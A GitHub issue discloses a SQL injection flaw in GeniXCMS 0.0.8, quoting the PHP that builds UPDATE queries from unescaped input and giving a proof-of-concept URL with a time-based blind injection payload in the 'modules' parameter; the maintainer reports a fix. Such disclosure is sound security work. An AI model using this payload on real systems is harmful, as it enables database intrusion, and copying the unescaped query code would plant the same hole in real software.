Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SQL Injection in Options.class.php through 0.0.8 version #68

Closed
superfish9 opened this issue Jan 19, 2017 · 2 comments
Closed

SQL Injection in Options.class.php through 0.0.8 version #68

superfish9 opened this issue Jan 19, 2017 · 2 comments

Comments

@superfish9
Copy link

superfish9 commented Jan 19, 2017

GeniXCMS_v0.0.8/inc/lib/Mod.class.php

if (isset($_GET['page']) && $_GET['page'] == "modules") {
            if (isset($_GET['act'])) {
                if ($_GET['act'] == ACTIVATE) {
                    if(!Token::isExist($_GET['token'])){
                        $alertred[] = TOKEN_NOT_EXIST;
                    }
                    if(!isset($alertred)){
                        self::activate($_GET['modules']);
                        $GLOBALS['alertgreen'] = MODULES_ACTIVATED;
                    }else{
                        $GLOBALS['alertred'] = $alertred;
                    }

continue:

public static function activate($mod){
        $json = Options::v('modules');
        $mods = json_decode($json, true);
        //print_r($mods);
        if (!is_array($mods) || $mods == "") {
            $mods = array();
        }
        if (!in_array($mod, $mods)) {
            # code...
            $mods = array_merge($mods, array($mod));
        }
        $mods = json_encode($mods);
        $mods = Options::update('modules', $mods);
        if($mods){
            return true;
        }else{
            return false;
        }
    }

GeniXCMS_v0.0.8/inc/lib/Options.class.php

public static function update($key, $val = '')
    {
        if (is_array($key)) {
            foreach ($key as $k => $v) {
                $post = Db::query("UPDATE `options` SET `value`='{$v}' WHERE `name` = '{$k}' LIMIT 1");
            }
        } else {
            $post = Db::query("UPDATE `options` SET `value`='{$val}' WHERE `name` = '{$key}' LIMIT 1");
        }
        return $post;
    }

POC:

first, access forgotpassword.php to get a token:
token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm
then access:
http://127.0.0.1/genixcms0.0.8/index.php?page=modules&act=activate&token=I34jF0V6R1quEIS3kFBDsZfqyIuB1u8ywKvnUPB5LKS6uSntgHk6KYIR6R4T5Y9pXXtZtSBeCz1XW0tm&modules=aa%27%20and%20%28select%20*%20from%20%28select%28if%28ascii%28substr%28%28select%20user%28%29%29%2C1%2C1%29%29%3D114%2Csleep%282%29%2C0%29%29%29a%29%20or%20%27a%27%3D%27a

We'll find that the page sleep 2 seconds(because my mysql user is root), which proved the vulnerability exist.

@superfish9 superfish9 changed the title SQL Injection in Options.class.php SQL Injection in Options.class.php through 0.0.8 version Jan 19, 2017
@semplon semplon self-assigned this Jan 19, 2017
@semplon
Copy link
Owner

semplon commented Jan 19, 2017

thank you @superfish9 i'll looking for it.

@semplon
Copy link
Owner

semplon commented Jan 19, 2017

Options.class.php security issue already fixed with this commit https://github.com/semplon/GeniXCMS/blob/master/inc/lib/Options.class.php#L57

semplon pushed a commit that referenced this issue Jan 22, 2017
@semplon semplon closed this as completed Jan 22, 2017
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

2 participants